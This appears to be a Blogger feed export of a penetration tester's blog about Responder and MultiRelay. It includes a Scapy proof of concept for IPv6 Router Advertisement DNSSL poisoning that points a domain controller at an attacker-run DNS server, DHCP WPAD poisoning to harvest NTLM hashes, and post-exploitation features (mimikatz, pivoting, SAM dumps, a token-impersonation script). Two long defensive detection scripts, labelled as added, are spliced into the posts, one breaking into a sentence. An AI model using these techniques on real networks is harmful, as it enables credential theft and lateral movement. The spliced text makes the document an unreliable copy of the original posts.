tag:blogger.com,1999:blog-32474523301056354252024-03-08T03:34:06.138-08:00Laurent Gaffié blogThis blog reflects my own opinions.Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.comBlogger36125tag:blogger.com,1999:blog-3247452330105635425.post-40943066720740469842021-12-21T18:17:00.008-08:002021-12-21T20:43:58.586-08:00Responder and IPv6 attacks<p> Responder 3.1.1.0 comes with full IPv6 support by default, which allows you to perform more attacks on IPv4 and IPv6 networks. As several people have pointed out over the years, Responder had always lacked IPv6 support and missed several attack paths, especially when it comes to IPv6-only networks or even mixed IPv4/IPv6 networks, since IPv6 is always the preferred stack on Windows.<br /><br />Responder also comes with a basic DNS server answering A, SRV and now AAAA records. Tools like <a href="https://github.com/dirkjanm/mitm6" target="_blank">mitm6</a> can be used to get IPv6 traffic (via DHCPv6) and Responder will take care of answering the resulting IPv6 and IPv4 DNS requests.<br /><br />While working on Responder's IPv6 implementation, I started to wonder how it could be possible to inject network settings on IPv4 hosts with a static IP, such as a Windows domain controller. One of the great things about IPv6, from a pentester's standpoint, is that you don't need to be on an IPv6-enabled network to successfully conduct these attacks.<br /></p>
<h3 style="text-align: left;">IPv6 Router Advertisement:</h3><div style="text-align: left;">Since DHCPv6 had already been pretty well covered by <a href="https://twitter.com/_dirkjan">@_dirkjan</a> with mitm6, and since we are primarily targeting hosts with a static address, ICMPv6 Router Advertisement seemed like a good option. 
In this case, we don't need to inject a route or even an IP address; the ideal goal would be a DNS server, which is possible on any Windows workstation/server even when its IPv4 DNS settings are static, <b>but not on a domain controller.</b></div><div style="text-align: left;"><b> </b></div><div style="text-align: left;"><h3 style="text-align: left;"><b><span>IPv6 RA DNS / DNSSL:</span></b></h3><div style="text-align: left;">Since I was not able to inject either an IPv6 address or a DNS server on the domain controller, the only option left was DNSSL <b><a href="https://datatracker.ietf.org/doc/html/rfc6106">(RFC 6106)</a></b>.</div><div style="text-align: left;">DNSSL allows you to provide a DNS suffix, also commonly known as a DNS Search List. For example, if you're part of the domain "test.local" and your workstation name is desktop-123, the FQDN would be "desktop-123.test.local" and the DNS suffix would be "test.local".</div><div style="text-align: left;"><h4 style="text-align: left;">Scapy to the rescue:</h4></div><div style="text-align: left;"><a href="https://github.com/secdev/scapy">Scapy</a> is a great tool/library to quickly test this kind of payload on your network.<br />The following Python proof of concept will add a DNS suffix on a domain controller (Server 2019, with latest updates):</div><blockquote><div style="text-align: left;">>>> from scapy.all import *<br /><br />>>> ra = IPv6(dst='FF02::1')/ICMPv6ND_RA(routerlifetime=0, reachabletime=0, prf=0)/ICMPv6NDOptDNSSL(lifetime=120, searchlist=['data.rogueserver.live'])<br /><br />>>> send(ra)<br /></div></blockquote><p>These lines mean: send a multicast ICMPv6 Router Advertisement to 'FF02::1' (all nodes), with router lifetime and reachable time set to 0, and inject a DNSSL entry 'data.rogueserver.live' with a lifetime of 2 minutes. We don't want to mess with things for too long, since every host listening to the ICMPv6 RA multicast will get poisoned with that DNSSL.</p><h3 style="text-align: left;">Effect on the Domain Controller:</h3><div style="text-align: left;">Basically, every DNS request that is not resolved by the DNS server (domain controller) will be sent to 'data.rogueserver.live'. So for example, if your workstation is joined to the "corp.local" domain and it's looking for "wpad.corp.local", and that entry does not exist, then the PDC will issue a DNS lookup (before NBT-NS/LLMNR, if enabled) for "wpad.data.rogueserver.live".<br /><br />This should not cause much disruption on the network since normal DNS queries will be resolved first by the domain controller; actually, most home modems/routers usually have a '.lan' or '.local' DNS suffix and those DNS requests go unanswered all the time.</div><div style="text-align: left;"> </div><div style="text-align: left;"><h3 style="text-align: left;">Responder Attack:</h3><div style="text-align: left;"> Now that we have successfully injected a DNS suffix on the domain controller, we need to exploit it.<br />The steps are similar to SSRF, SQLi or XXE exfiltration: first you need a cheap domain name, like 'rogueserver.live', and a server on the internet.<br /><br />The next step is to configure the DNS settings of your domain name:<br /><ul style="text-align: left;"><li>Set an A record for 'rogueserver.live' pointing to your server IP.</li><li>Set another A record for 'ns.rogueserver.live' pointing to your server IP.</li><li>Set an NS record for 'data.rogueserver.live' pointing to 'ns.rogueserver.live'.</li><li>Set 2-3 NS records for 'rogueserver.live' pointing to your DNS provider, usually ns1.provider.com, ns2.provider.com, etc.</li></ul>DNS has been set up; now comes the Responder part. First, I had to update Responder's DNS server to handle the OPT pseudo-record for <span>EDNS, since every request coming from the PDC will have an OPT additional record <a href="https://datatracker.ietf.org/doc/html/rfc7873" target="_blank">(RFC 7873)</a>. 
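The RA DNSSL poisoning shown with Scapy above, seen from the defender's side: an added example (not from this post and not part of Responder) that parses an ICMPv6 Router Advertisement, extracts the RDNSS and DNSSL options, and flags an advertisement that comes from an untrusted link-local source, pushes DNS settings while offering no default route (router lifetime 0), or advertises a suffix or resolver outside an allow-list. The sample bytes are constructed to match the Scapy one-liner; the trusted router address and the allow-lists are assumed site values.

```python
import struct
import ipaddress
from dataclasses import dataclass, field

ND_ROUTER_ADVERT = 134   # ICMPv6 type (RFC 4861)
OPT_RDNSS = 25           # Recursive DNS Server option (RFC 6106)
OPT_DNSSL = 31           # DNS Search List option (RFC 6106)


@dataclass
class RouterAdvert:
    router_lifetime: int                        # 0 = sender is not a default router
    prf: int                                    # default router preference bits
    rdnss: list = field(default_factory=list)   # [(lifetime, [resolver, ...]), ...]
    dnssl: list = field(default_factory=list)   # [(lifetime, [suffix, ...]), ...]


def _decode_names(buf):
    """Decode DNS wire-format names from a DNSSL option; trailing zero bytes are padding."""
    names, pos = [], 0
    while pos < len(buf):
        if buf[pos] == 0:                       # padding after the last name
            pos += 1
            continue
        labels = []
        while pos < len(buf) and buf[pos] != 0:
            ln = buf[pos]
            if ln & 0xC0 or pos + 1 + ln > len(buf):   # no compression pointers, no overrun
                raise ValueError("malformed DNSSL label")
            labels.append(buf[pos + 1:pos + 1 + ln].decode("ascii"))
            pos += 1 + ln
        if pos >= len(buf):
            raise ValueError("truncated DNSSL name")
        pos += 1                                # root label terminates the name
        names.append(".".join(labels))
    return names


def parse_ra(icmp6):
    """Parse the ICMPv6 payload of a Router Advertisement (checksum is not verified here)."""
    if len(icmp6) < 16 or icmp6[0] != ND_ROUTER_ADVERT:
        raise ValueError("not an ICMPv6 Router Advertisement")
    ra = RouterAdvert(router_lifetime=struct.unpack("!H", icmp6[6:8])[0],
                      prf=(icmp6[5] >> 3) & 0x3)
    pos = 16                                    # options follow the 16-byte RA header
    while pos + 2 <= len(icmp6):
        otype, olen = icmp6[pos], icmp6[pos + 1]
        end = pos + olen * 8                    # option length is in units of 8 octets
        if olen == 0 or end > len(icmp6):       # RFC 4861: zero-length or truncated, discard
            raise ValueError("malformed ND option")
        body = icmp6[pos + 2:end]               # reserved(2) lifetime(4) data...
        if otype in (OPT_RDNSS, OPT_DNSSL):
            lifetime = struct.unpack("!I", body[2:6])[0]
            if otype == OPT_RDNSS:
                addrs = [str(ipaddress.IPv6Address(body[i:i + 16]))
                         for i in range(6, len(body) - 15, 16)]
                ra.rdnss.append((lifetime, addrs))
            else:
                ra.dnssl.append((lifetime, _decode_names(body[6:])))
        pos = end
    return ra


def audit_ra(icmp6, src, trusted_routers, allowed_suffixes, allowed_resolvers=()):
    """Findings for one RA received from link-local address `src` (assumed site policy)."""
    ra = parse_ra(icmp6)
    findings = []
    if src not in trusted_routers:
        findings.append(f"RA from untrusted source {src}")
    if ra.router_lifetime == 0 and (ra.rdnss or ra.dnssl):
        findings.append("RA pushes DNS configuration without offering a default route")
    for lifetime, names in ra.dnssl:
        for name in names:
            if not any(name == a or name.endswith("." + a) for a in allowed_suffixes):
                findings.append(f"DNSSL suffix {name!r} (lifetime {lifetime}s) not in allow-list")
    for lifetime, addrs in ra.rdnss:
        for addr in addrs:
            if addr not in allowed_resolvers:
                findings.append(f"RDNSS resolver {addr} (lifetime {lifetime}s) not in allow-list")
    return findings


# Constructed sample (not a capture): the ICMPv6 payload the Scapy one-liner emits.
SAMPLE_RA = bytes.fromhex(
    "86 00 00 00"                           # type 134, code 0, checksum (zeroed)
    "00 00 00 00"                           # hop limit 0, flags 0 (prf 0), router lifetime 0
    "00 00 00 00 00 00 00 00"               # reachable time 0, retrans timer 0
    "1f 04 00 00 00 00 00 78"               # DNSSL: type 31, len 4 (32 bytes), lifetime 120 s
    "04 64 61 74 61"                        # "data"
    "0b 72 6f 67 75 65 73 65 72 76 65 72"   # "rogueserver"
    "04 6c 69 76 65 00 00"                  # "live", root label, 1 byte padding
)

if __name__ == "__main__":
    # Assumed site policy: fe80::1 is the only router, corp.local the only search suffix.
    for finding in audit_ra(SAMPLE_RA, "fe80::abcd", {"fe80::1"}, {"corp.local"}):
        print("[!]", finding)
```

The parser takes the ICMPv6 payload only; to feed it live traffic you would pull that payload and the source address out of whatever capture or raw-socket layer you already use.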
<br /></span></div><div style="text-align: left;"> </div><div style="text-align: left;">You need two instances of Responder: one on the target local network, let's say hosted on 192.168.0.175, and one instance on the internet.</div><div style="text-align: left;"> </div><div style="text-align: left;">The instance on the internet will be used as a rogue DNS server, answering the domain controller with the local IP of the other Responder instance hosted on the local network.</div><div style="text-align: left;"></div><div style="text-align: left;">The attack looks like this on the VPS Responder instance:</div><div style="text-align: left;"> </div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhsbHK3JGlz4w4c1XfhjgcVAHzLKjpDQYOghVbigybLduNj9IPYWU5GpLkJEFziYSNDurX3pzpgUuPuShcecYELus4U_O0c0IIIrTbNaFU0eCdxtIuzB3fkV2hI-jL_O-rIcHFo960iM2-ravyGCtkNqo7R_3q-HS9z5noIkuB_zUOXBq05mjEujofG=s1019" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="337" data-original-width="1019" height="212" src="https://blogger.googleusercontent.com/img/a/AVvXsEhsbHK3JGlz4w4c1XfhjgcVAHzLKjpDQYOghVbigybLduNj9IPYWU5GpLkJEFziYSNDurX3pzpgUuPuShcecYELus4U_O0c0IIIrTbNaFU0eCdxtIuzB3fkV2hI-jL_O-rIcHFo960iM2-ravyGCtkNqo7R_3q-HS9z5noIkuB_zUOXBq05mjEujofG=w518-h212" width="518" /></a></div><div style="text-align: left;">Here, we are using Responder with the -e option, which poisons the request with an IP of our choice, in this case a local IP (192.168.0.175), poisoned from the internet.</div><div style="text-align: left;"><br /></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;">And on the other Responder instance (192.168.0.175), which is located on the local network where the target PDC is located:<br /> <div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEixa27LDTo22ETtQlJYxpD5vF4z934B2Cy5sBA7llL3gC5WSMTDghCMNgnGSm5Np-h4YQDA_oOlLhxJShzDfaTbMFKx-sHSqkJ-XGMxKEooW9DPOAwoqBuvl485m8lUcpvHI830SdYtNan7_L6QRIVrnkhGFzCYCw5XEYdbo-j2nJ-ebVWXu-U_4F6W=s803" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="184" data-original-width="803" height="146" src="https://blogger.googleusercontent.com/img/a/AVvXsEixa27LDTo22ETtQlJYxpD5vF4z934B2Cy5sBA7llL3gC5WSMTDghCMNgnGSm5Np-h4YQDA_oOlLhxJShzDfaTbMFKx-sHSqkJ-XGMxKEooW9DPOAwoqBuvl485m8lUcpvHI830SdYtNan7_L6QRIVrnkhGFzCYCw5XEYdbo-j2nJ-ebVWXu-U_4F6W=w640-h146" width="640" /></a></div></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><h3 style="text-align: left;">Additional Remarks:</h3><div style="text-align: left;">With that DNS suffix injected, any sysadmin on the network who mistypes a name like 'pdc02' instead of 'pdc-02' will get poisoned, since the name won't be resolved by the Active Directory DNS server, and our rogue server will resolve it. Basically, it will act as what LLMNR/NBT-NS used to do before it was disabled: resolving queries that were not resolved by the domain controller, but with the priority of a DNS lookup.</div><div style="text-align: left;"><br /></div></div></div><h3 style="text-align: left;">Remediation:</h3><div style="text-align: left;">Disable IPv6 on the domain controller if it's not necessary. <br />If IPv6 is necessary on your network, look for switch security options such as RA Guard on Cisco.</div></div><p><br /></p>Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-78297701944579523772021-08-19T04:45:00.002-07:002021-12-13T15:54:49.214-08:00Responder's DHCP Poisoner<p> Responder 3.0.7.0 comes with a new DHCP poisoner module. 
This module allows you to remotely inject a WPAD server with no user interaction (0 click) and capture/relay NTLM credentials on all Windows versions, ranging from Windows 98 to the current versions (Windows 11, Server 2022).</p><h4 style="text-align: left;">WPAD and DHCP<br /></h4><div style="text-align: left;"> Windows uses several custom DHCP options, such as NetBIOS, WINS and WPAD settings. When a workstation sends a DHCP request to get its network settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution.</div><div style="text-align: left;"><br />WPAD configuration is currently provided in <a href="https://docs.microsoft.com/en-us/previous-versions/tn-archive/bb794881(v=technet.10)" target="_blank">DHCP option 252</a>.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The DHCP protocol is quite old (1993) and doesn't provide any relevant security. Requests are broadcast, can be relayed across subnets with a DHCP relay, and obviously anyone on a subnet who can answer faster than the actual DHCP server can inject any network settings on the client that issued the DHCP request.</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><h4 style="text-align: left;">Spoofing DHCP challenges</h4><div style="text-align: left;">Spoofing DHCP responses without disruption can be challenging, since you're interfering with a workstation's network configuration. Usually, you need very good knowledge of the target subnet: where the DNS server is, where the switch is, the routing table, domain, netmask, DHCP server, etc. Any mistake with these settings will result in disruption on the network.</div><div style="text-align: left;"> </div><div style="text-align: left;">However, spoofing DHCP answers has unique benefits. 
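As an added, detection-side example (not Responder code and not from this post), the following Python checks a DHCP server reply for the traits a spoofed answer of the kind described in this post carries: a server identifier outside the site's known DHCP servers, a lease time far below normal (the module described here uses 10 seconds), and the presence of WPAD option 252. The known-server set, the 600-second lease floor and the packets themselves are constructed assumptions.

```python
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"          # RFC 2131: marks the start of DHCP options
OPT_PAD, OPT_END = 0, 255
OPT_LEASE_TIME, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_WPAD = 51, 53, 54, 252
DHCPOFFER, DHCPACK = 2, 5
BOOTREPLY = 2


def _ip4(raw):
    return ".".join(str(x) for x in raw)


def parse_dhcp(pkt):
    """Split a BOOTP/DHCP message into header fields and a {code: value} option map."""
    if len(pkt) < 240 or pkt[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    hlen = pkt[2]
    header = {
        "op": pkt[0],
        "xid": struct.unpack("!I", pkt[4:8])[0],
        "yiaddr": _ip4(pkt[16:20]),
        "chaddr": ":".join(f"{x:02x}" for x in pkt[28:28 + hlen]),
    }
    opts, pos = {}, 240
    while pos < len(pkt) and pkt[pos] != OPT_END:
        code = pkt[pos]
        if code == OPT_PAD:
            pos += 1
            continue
        if pos + 2 > len(pkt) or pos + 2 + pkt[pos + 1] > len(pkt):
            raise ValueError("truncated DHCP option")
        ln = pkt[pos + 1]
        opts[code] = opts.get(code, b"") + pkt[pos + 2:pos + 2 + ln]   # RFC 3396: repeats concatenate
        pos += 2 + ln
    return header, opts


def audit_dhcp_reply(pkt, known_servers, min_lease=600):
    """Findings for one server-to-client DHCP message, given the site's legitimate server IPs."""
    header, opts = parse_dhcp(pkt)
    msg_type = opts.get(OPT_MSG_TYPE, b"\x00")[0]
    if header["op"] != BOOTREPLY or msg_type not in (DHCPOFFER, DHCPACK):
        return []                                # only OFFER/ACK configure the client
    findings = []
    server = _ip4(opts[OPT_SERVER_ID]) if OPT_SERVER_ID in opts else None
    if server not in known_servers:
        findings.append(f"reply to {header['chaddr']} from unknown server identifier {server}")
    if OPT_LEASE_TIME in opts:
        lease = struct.unpack("!I", opts[OPT_LEASE_TIME][:4])[0]
        if lease < min_lease:
            findings.append(f"lease time {lease}s below the {min_lease}s floor")
    if OPT_WPAD in opts:
        wpad = opts[OPT_WPAD].rstrip(b"\x00").decode("ascii", errors="replace")
        findings.append(f"option 252 (WPAD) present: {wpad!r}")
    return findings


def build_reply(msg_type, server_id, lease, client_mac, wpad=None):
    """Minimal BOOTREPLY used as a constructed test fixture (not a captured packet)."""
    hdr = struct.pack("!BBBBIHH", BOOTREPLY, 1, 6, 0, 0x3903F326, 0, 0)  # op htype hlen hops xid secs flags
    hdr += bytes(4) + bytes([192, 168, 0, 50]) + bytes(8)               # ciaddr yiaddr siaddr giaddr
    hdr += bytes.fromhex(client_mac.replace(":", "")) + bytes(10)        # chaddr (16 bytes)
    hdr += bytes(64 + 128)                                               # sname, file
    opts = bytes([OPT_MSG_TYPE, 1, msg_type, OPT_SERVER_ID, 4])
    opts += bytes(int(x) for x in server_id.split("."))
    opts += bytes([OPT_LEASE_TIME, 4]) + struct.pack("!I", lease)
    if wpad is not None:
        opts += bytes([OPT_WPAD, len(wpad)]) + wpad.encode("ascii")
    return hdr + MAGIC_COOKIE + opts + bytes([OPT_END])


if __name__ == "__main__":
    # Assumed site policy: 192.168.0.1 is the only legitimate DHCP server.
    legit = build_reply(DHCPACK, "192.168.0.1", 86400, "00:11:22:33:44:55")
    rogue = build_reply(DHCPACK, "192.168.0.175", 10, "00:11:22:33:44:55",
                        wpad="http://192.168.0.175/wpad.dat")
    for pkt in (legit, rogue):
        print(audit_dhcp_reply(pkt, {"192.168.0.1"}))
```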
It's definitely stealthier than ARP poisoning: one unicast response is sufficient to permanently poison a victim's routing information, and it's also common to see multiple DHCP servers operating on a network. Unicast DHCP answers are more complex to detect; a few switches provide security settings such as DHCP snooping to prevent this, however those settings are not straightforward and <u>are often misconfigured when enabled</u>.<br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><h4 style="text-align: left;">Responder approach<br /></h4></div><div style="text-align: left;"> Previous Responder versions included <a href="https://github.com/lgandx/Responder/wiki/DHCP-Server" target="_blank">a DHCP.py script in the tools folder</a>. This script was not the easiest to operate, and the fear of causing disruption on client networks made it a "last option" tool.</div><div style="text-align: left;"> </div><div style="text-align: left;">Responder 3.0.7.0 changed that: DHCP poisoning is completely automated and causes no disruption on the network.</div><div style="text-align: left;">To understand how Responder does that, you need to understand how DHCP works.<br />A client performs a broadcast DHCP REQUEST when the workstation is restarted, when the network adapter is enabled or simply when the DHCP lease expires (usually a few hours); the DHCP server replies with a DHCP ACK containing all network settings and additional options.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Responder takes advantage of that and races against the legitimate DHCP server to answer with a DHCP ACK containing invalid network settings, a valid WPAD server (Responder's IP) and a very short lease time (10 seconds).</div><div style="text-align: left;"> </div><div style="text-align: left;">The workstation gets the WPAD server injected and will issue a new DHCP request right after; Responder will let the legitimate DHCP server do its job and provide the right network settings. </div><div style="text-align: left;"> </div><div style="text-align: left;">Due to the Windows DHCP client design, an injected WPAD server is permanent until the next reboot, regardless of whether another DHCP server provides a new configuration :)<br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;">A maximum of 4 spoofing attempts per MAC address has been configured in the DHCP module, which should be more than enough to get the WPAD server injected.<br /></div><div style="text-align: left;"> </div><div style="text-align: left;"><h4 style="text-align: left;">How to run it:</h4><div style="text-align: left;">The new DHCP module is disabled by default; you can enable it with the -d command line option.</div><div style="text-align: left;"><strike>When enabled, you need to edit Responder.conf and update the WPADScript setting:<br /></strike><blockquote><strike>WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY <b>ProxySrv</b>:3128; PROXY <b>ProxySrv</b>:3141; DIRECT';}</strike></blockquote></div><div style="text-align: left;"><strike>The text in bold should be replaced with your Responder IP address, because LLMNR/NBT-NS is likely disabled, so you want to avoid any lookups going unanswered and lose valuable NTLM hashes.</strike><b><br /><br /></b>WPAD script configuration is automated; the next step is to launch Responder with the following arguments:</div><div style="text-align: left;">./Responder.py -I eth0 -r<b>Pd</b>v</div><div style="text-align: left;"><br />Why -P and not -F? 
Nowadays, WPAD NTLM authentication is unlikely to succeed, therefore forcing NTLM authentication on wpad.dat retrieval is not recommended. The concept is to serve the wpad.dat file with no user authentication, and as soon as the client starts using our proxy, we force authentication with the Proxy-Auth module :)<br /><br />When a WPAD server is injected, the user on the workstation doesn't need to open or do anything; NTLM hashes start to flow into Responder automatically.<br /></div><div style="text-align: left;"><h4 style="text-align: left;">Final words</h4><div style="text-align: left;">This Responder version is currently available for our sponsors on <a href="https://porchetta.industries" target="_blank">Porchetta Industries</a>. </div><div style="text-align: left;">This functionality will be released publicly for everyone else in a few months on GitHub.</div><div style="text-align: left;">Porchetta Industries is a unique platform allowing tool makers to be sponsored for their work and the tools they provide freely to the security community at large.</div><div style="text-align: left;">For more information, visit: <a href="https://porchetta.industries">https://porchetta.industries</a></div></div></div><div style="text-align: left;"> </div><div style="text-align: left;"> </div></div>Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-51407912505411167212021-04-07T21:06:00.016-07:002021-06-02T18:29:33.655-07:00 Status of Submitted Vulnerabilities To MSRC <p>This list is intended to give vague information about submitted bugs,
but important information about the communication process and timeline.</p><h4 style="text-align: left;">
Bug Title: Microsoft SMBv1 Disabled; Not Fully Disabled.<br /></h4>
<ul style="text-align: left;"><li>Affected software: Microsoft Servers 2019, 2016, 2012.</li><li>Type: Protocol Implementation Issue.<br /></li><li>Submitted: 07/04/2021</li><li>Coordinated disclosure agreement expiration: 13/07/2021.</li><li>Notes and updates: <br /><br />- Complete details were sent on 07/04/2021, ACKed by MSRC on 08/04/2021.<br /><br />- MSRC asked for a PoC.<br /><br />- PoC sent with extra details.<br /><br />- MSRC asked to extend the deadline to 13/07/2021 instead of 07/07/2021 since their July release is on the 13th.<br /><br />- Agreed to MSRC's request and offered to provide more details if needed.<br /><br />- Requested an update from MSRC on 16/04/2021.<br /><br />- MSRC responded on 19/04/2021 and asked what the security issue is with having NetBIOS enabled by default.<br /><br />- A complete description of why it is a security concern was sent the same day.<br /><br />- On 21/04/2021 a status update was requested.<br /><br />- MSRC answered on May 7th, and asserted multiple falsehoods about the protocol in question, referring to MSFT documentation, and stated that NTLM messages are safe even when intercepted. Additionally, MSRC mentioned that I'm allowed to blog/disclose this issue.<br /><br />- A lengthy factual answer was sent back on May 9th, detailing the incoherence in both MSRC's answer and MSFT documentation, especially where publicly available NT4/Windows XP source code directly contradicts the said MSFT documentation. MSRC was also asked to run MultiRelay in conjunction with Responder in an A-D lab environment, and confirm whether NTLM messages are really that safe when intercepted. A temporary hold on disclosure was offered until the said email is assessed. <br /><br />- MSRC answered on May 10th, stating that they will review the "added submissions".<br />
<br />- On May 26th, MSRC responded stating that they finally understood the issue and will be working on a fix. <br /></li></ul><ul style="text-align: left;"><li>*Check for more updates*.</li></ul>Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-30752773047709162252017-03-31T10:21:00.000-07:002017-03-31T10:55:25.343-07:00MultiRelay 2.0: Runas, Pivot, SVC, and Mimikatz Love.<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<br />
<h3 style="text-align: left;">
Introduction: </h3>
<div style="text-align: left;">
If you haven't read the <a href="http://g-laurent.blogspot.com/2016/10/introducing-responder-multirelay-10.html" target="_blank">initial MultiRelay introduction post</a>, I strongly invite you to read it. </div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
MultiRelay Description:</h3>
<div style="text-align: left;">
MultiRelay 2.0 is a powerful, professional-grade pentest utility included in Responder's tools folder, giving you the ability to perform targeted NTLMv1 and NTLMv2 relay and post-exploitation on a selected target.</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
New Functionalities: </h3>
<div style="text-align: left;">
Several new functionalities were added to the MultiRelay shell interface, those are listed below:</div>
<ul style="text-align: left;">
<li>Upload a file on the target:<br />Using the "upload" command, a user can push any file using the SMB
protocol on the compromised target. The file will be uploaded in
c:\Windows\Temp\</li>
</ul>
<ul style="text-align: left;">
<li>Delete a file on the target:<br />Using the "delete" command, a user can delete any file using the SMB
protocol on the compromised target. If the file has been successfully
deleted, no errors will be shown.</li>
</ul>
<ul style="text-align: left;">
<li>Run a command as the currently logged in user:<br />Using the "runas" command, a user will be able to launch a service
which will run a command as the currently logged in user.</li>
</ul>
<ul style="text-align: left;">
<li>Pivot to another host, using the currently logged in user's sets of credentials.<br />Using the "pivot" command, a user will attempt to propagate to another host (Lateral movement).</li>
</ul>
<ul style="text-align: left;">
<li>Run remote Mimikatz (32-bit, 64-bit) RPC commands:<br />Using the "mimi" or "mimi32" command, the user will be able to interact with mimikatz RPC on the target.</li>
</ul>
<ul style="text-align: left;">
<li>Scan the current /24 or /16 in order to find other hosts to pivot to:<br />When using the "scan /24" command, a user will be able to scan the entire class C and choose another host to pivot to. </li>
</ul>
<ul style="text-align: left;">
<li>Run any other command on the target as LocalSystem:<br />Any other command will launch a service which will run that command as LocalSystem.</li>
</ul>
<br />
<div style="text-align: left;">
Since the previous version, 2 new options were added:</div>
<ul style="text-align: left;">
<li>-c Run a command as system then exit (scripting).<br /> </li>
<li>-d Dump the SAM database then exit (scripting).</li>
</ul>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Good Things To Know:</h3>
<ul style="text-align: left;">
<li><span style="font-weight: normal;">All binaries used by MultiRelay are stored in ./tools/MultiRelay/bin/ <br /> </span></li>
<li><span style="font-weight: normal;">Filenames for these binaries are specified in MultiRelay.py, starting at line 48:<br />MimikatzFilename = "./MultiRelay/bin/mimikatz.exe"<br />Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"<br />RunAsFileName = "./MultiRelay/bin/Runas.exe"<br />SysSVCFileName = "./MultiRelay/bin/Syssvc.exe"<br /></span></li>
<li><span style="font-weight: normal;">Any binaries can be replaced with your own, simply make sure to change the name accordingly in MultiRelay.py.<br /></span></li>
<li><span style="font-weight: normal;">The upload local path is ./tools/. If you put your payloads in ./tools/MultiRelay/, you'll have to run: upload MultiRelay/custompayload.exe. Best is to provide the full path.<br /></span></li>
<li><span style="font-weight: normal;">If you have some sets of credentials, you can use MultiRelay without relaying an NTLM hash. On one screen point MultiRelay to your target and on another one run: smbclient -U user%password -W domain //Your_IP/c$<br /></span></li>
<li><span style="font-weight: normal;">Think about the command you're about to launch before launching it. Uploading your custom version of mimikatz and running "mimikatz" will keep the process hanging and you won't be able to delete the file unless you use taskkill /F /IM file.exe. For custom mimikatz command usage with MultiRelay, please refer to the MultiRelay 2.0 Wushu section. <br /></span></li>
</ul>
<h3 style="text-align: left;">
NTLM Relay Lateral Movement:</h3>
<div style="text-align: left;">
MultiRelay's philosophy is that any successful NTLM Relay <a href="https://github.com/lgandx/Responder/blob/master/tools/MultiRelay/RelayMultiCore.py#L478" target="_blank">is precious and everything should be done to keep that SMB connection alive.</a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Getting command execution via NTLM Relay is commonly achieved via SVCCTL:</div>
<ul style="text-align: left;">
<li>Open IPC$ named pipe \SVCCTL -> create a service with your command -> start the service -> get the output -> done.</li>
</ul>
<div style="text-align: left;">
While running commands as SYSTEM is cool, you can't do much on the network with this user, meaning that you cannot access other network resources with a local system account. <br />
This limits the compromise to only one host at a time, and you might wait a long time before another administrator hash flies over the wire...</div>
<div style="text-align: left;">
While building MultiRelay 1.0, I thought it would be nice to execute commands as the currently logged in user in the next version and have the ability to pivot across the network. When I started to work on MultiRelay 2.0, I wrote a 5-line Python script (Runas.py) which impersonates
a logged in user:<br />
<br /></div>
<blockquote class="tr_bq">
<div style="text-align: left;">
# Runas.py: run a command in the context of the interactive console user (pywin32; must run as LocalSystem)<br />
import sys, win32ts, win32process, win32con<br />
<br />
# Session attached to the physical console (no Remote Desktop Services needed)<br />
SessionID = win32ts.WTSGetActiveConsoleSessionId()<br />
# Primary token of the user logged in to that session; needs the SE_TCB_NAME privilege, which LocalSystem has<br />
UserToken = win32ts.WTSQueryUserToken(SessionID)<br />
# Start cmd.exe /c with the script's arguments under that token; returns process/thread handles and IDs<br />
h,tn,pi,ti = win32process.CreateProcessAsUser(UserToken, "c:\\Windows\\system32\\cmd.exe", "/c "+' '.join(sys.argv[1:]), None, None, True, win32con.NORMAL_PRIORITY_CLASS, None, None, win32process.STARTUPINFO())</div>
</blockquote>
<div style="text-align: left;">
As stated in <a href="https://msdn.microsoft.com/en-us/library/aa383835(v=vs.85).aspx" target="_blank">WTSGetActiveConsoleSessionId MSDN documentation</a><br />
WTSGetActiveConsoleSessionId "Retrieves the session identifier of the console session. The console
session is the session that is currently attached to the physical
console. Note that <u>it is not necessary that Remote Desktop Services be
running for this
function to succeed</u>".<br />
Once we have the session ID, we use the <a href="https://msdn.microsoft.com/en-us/library/aa383840(v=vs.85).aspx" target="_blank">WTSQueryUserToken</a> function to retrieve the Token associated with the previously acquired Session ID, and call <br />
<a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms682429(v=vs.85).aspx" target="_blank">CreateProcessAsUser</a> with our command.</div>
<div style="text-align: left;">
In short, we're able to impersonate any logged in user and re-use their credentials and resource access across the network. This opens a whole new kind of NTLM Relay attack vector: propagation and mass compromise resulting from 1 relayed authentication.</div>
<h4 style="text-align: left;">
Teaming up with @gentilkiwi:</h4>
<div style="text-align: left;">
